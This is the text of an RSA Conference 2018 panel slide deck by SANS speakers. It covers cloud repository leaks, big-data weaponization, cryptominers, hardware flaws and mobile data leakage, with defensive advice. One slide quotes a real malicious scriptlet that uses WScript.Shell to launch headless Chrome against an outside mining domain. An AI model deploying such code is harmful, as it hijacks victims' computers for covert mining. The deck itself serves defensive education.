The Five Most Dangerous New Attack Techniques, and What’s to … · 2019-07-26 · The Five Most...
Transcript of The Five Most Dangerous New Attack Techniques, and What’s to … · 2019-07-26 · The Five Most...
Moderator: Alan Paller
Speakers:
Ed SkoudisJohannes UllrichHeather Mahalik
The Five Most Dangerous New Attack Techniques, and What’s to ComeDecember 5, 2018
© 2018 RSA Conference. All rights reserved.
About This Session
• An update on topics introduced during the keynote panel discussion at RSA Conference
• Please ask questions for our panelists for the Q&A section after the initial brief presentations
2
Cloud Data Repository Breaches and Weaponization of Big DataEd SkoudisSANS Faculty Fellow and Pen Test Curriculum LeadDirector, SANS NetWars, CyberCity, and STX Projects
© 2018 RSA Conference. All rights reserved.
Repositories and Cloud Storage Data Leakage
• Software is built in a different way today• Cloud-based collaboration, code repositories,
and data storage• GitHub, Amazon AWS/S3, Google Cloud
Platform, Microsoft Azure, Docker Hub, etc.• Private repositories accidentally marked public• Public repositories with sensitive data in them
(keys and passwords)• Code and data put in the wrong repository
© 2018 RSA Conference. All rights reserved.
What You Can Do
• Data asset inventory• Data curator• Educate architects and developers
• Prevent developers from committing code with leaked creds:
• git-seekret• git-secrets
• Search for sensitive information in repositories• gitrob
• Review access logs associated with your assets
© 2018 RSA Conference. All rights reserved.
• Uses machine learning to discover and classify sensitive data in Amazon S3 buckets
• PII, intellectual property, etc.
• It then uses Amazon CloudWatch to monitor access looking for anomalies
• Price is $5 per GB protected, plus per $4 per 100,000 events
© 2018 RSA Conference. All rights reserved.
Microsoft Azure SQL Database Threat Detection• Uses machine learning to look at
cloud-based SQL Server event logs for anomalous activity:
• Suspicious access• Anomalous queries• Potential vulnerabilities• SQL injection attacks
• Price is $15 per database per month
© 2018 RSA Conference. All rights reserved.
Google’s Data Loss Prevention API• Looks for over 70 predefined detectors for PII and other sensitive information • Also looks for context clues• Supports automated
classification of data• Integrate into your own
applications built on Google’s infrastructure
• Complex pricing structurebased on inspection units(IUs) and transformation units (TUs)…
• 10 Giga Units are free• …then it’s $0.30 per GU after that
© 2018 RSA Conference. All rights reserved.
Weaponization of Big Data
• It’s not just about getting shell or exfiltratingspecific PII for criminal use any more
• Increasingly, it’s about hacking the data itself• Disparate sources and correlation• De-anonymization and much more• Are we fighting the last war?• No, but a big new front is hugely relevant
© 2018 RSA Conference. All rights reserved.
Tim Cook Comments
"Our own information, from the everyday to the deeply personal, is being weaponized against us with military efficiency."
"We shouldn't sugarcoat the consequences. This is surveillance. And these stockpiles of personal data serve only to enrich the companies that collect them."
International Conference of Data Protection and Privacy Commissioners in Brussels in October 2018
© 2018 RSA Conference. All rights reserved.
Weaponization of Big Data Analytics• March 2018: Announcement of
Cambridge Analytica’s scraping and analysis of Facebook data for the 2016 election
• Oct 2018: Russian firms who build facial recognition software for the Russian government scraped Facebook image data
• 2015: OPM breach of 22 Million government employee and contractors’ data, plus 5.6 Million fingerprints
© 2018 RSA Conference. All rights reserved.
What You Can Do
• Be careful about exposing data, even if it seems innocuous• Analyze business risks in terms of privacy implications• Consider how your data could be used with others’ data to
undermine your mission• Learn about Open Source Intelligence (OSINT) and data
analytics• Holiday Hack Challenge 2017 Naughty and Nice List• Holiday Hack Challenge 2018 coming in the next week or two
Cryptominer UpdateHardware VulnerabilitiesJohannes B. Ullrich, Ph.D.Dean of Research SANS Technology Inst.Directory of Internet Storm Center
© 2018 RSA Conference. All rights reserved.
Cryptocoin Mining – Prices are Dropping
14
0
200
400
600
Nov 2017 Jan 2018 Apr 2018 Jul 2018
Avg. PC: $10/year(end of 2018)
© 2018 RSA Conference. All rights reserved.
Miners are Improving
• Using less than 100% of CPU• Private mining pools• Root kits to evade detection• Observing user behavior
(turn off when system in use)• Better tailoring to system capabilities
15
© 2018 RSA Conference. All rights reserved.
Example: Coinmining in Headless Browser
16
<registration progid="TESTING" classid="{A1112221-0000-0000-3000-000DA00DABFC}" ><script language="JScript"><![CDATA[var foo = new ActiveXObject("WScript.Shell").Run("chrome.exe --headless --disable-gpu --remote-debugging-port=9222http://slprmnr.tk/obfus.html");]]> </script> </registration>
© 2018 RSA Conference. All rights reserved.
Return to IoT Mining
• 2014: Litecoin Mining common payload for IoT exploits (e.g. DVRs)
• 2016: Mirai Botnet: Focus shifts to DDoS• 2018: Coin miners are back (mostly Monero)
17
© 2018 RSA Conference. All rights reserved.
Hardware Issues Keep Coming
• March 2018 Branchscope• May 2018 various Spectre variants• August 2018 L1TF Flaws• Nov 2018 ECC Rowhammer demonstrated (first Feb 2017)
Never mind various BMC (Base Management Controller) issues and SPI flash vulnerabilities
18
© 2018 RSA Conference. All rights reserved.
Performance Issues / Patches
• Still vastly different numbers• Some of the patches can add up to substantial losses• Much depends on workload and operating system
optimizations• Patches delivered via operating system updates, but no
available for older systems
19
Data Leakages from Mobile
Heather MahalikSANS Senior InstructorDigital Forensics Expert
© 2018 RSA Conference. All rights reserved.
Privacy: Data Leakages from Smartphones
• Variety of operating systems• Lacking updates and security
features• Apps, apps, and more apps• Location tracking• Cloud…
Mobile devices are one of the
easiest platforms for attacks
21
© 2018 RSA Conference. All rights reserved.
Why the Mobile Device?
• Believe it or not, your phone knows more than you think!• How attacks happen:
• Application installs/permissions• Malware/Spyware• Stealing credentials• Cloud
22
© 2018 RSA Conference. All rights reserved.
Location Tracking
Maps
Navigation
Hiding in application
data
EXIF data
Health data
Exercise apps
23
© 2018 RSA Conference. All rights reserved.
Just How Much Can Be Leaked?
24
© 2018 RSA Conference. All rights reserved.
The Social Media Nightmare
25
© 2018 RSA Conference. All rights reserved.
Ways to Mitigate
• Know what you install• Read before saying “yes” • Consider the pros and cons of 2FA• Use a third-party authenticator
• Google Authenticator• GlobalSign• Last Pass• Microsoft Authentication
26
© 2018 RSA Conference. All rights reserved.
Reality of Data Leakages from Mobile
• Great for Law Enforcement• Awful for us!• Can 2FA help or does it hurt us?• If you think this is bad, wait until you see the cloud
vulnerabilities and data leakages
27
Open Q&A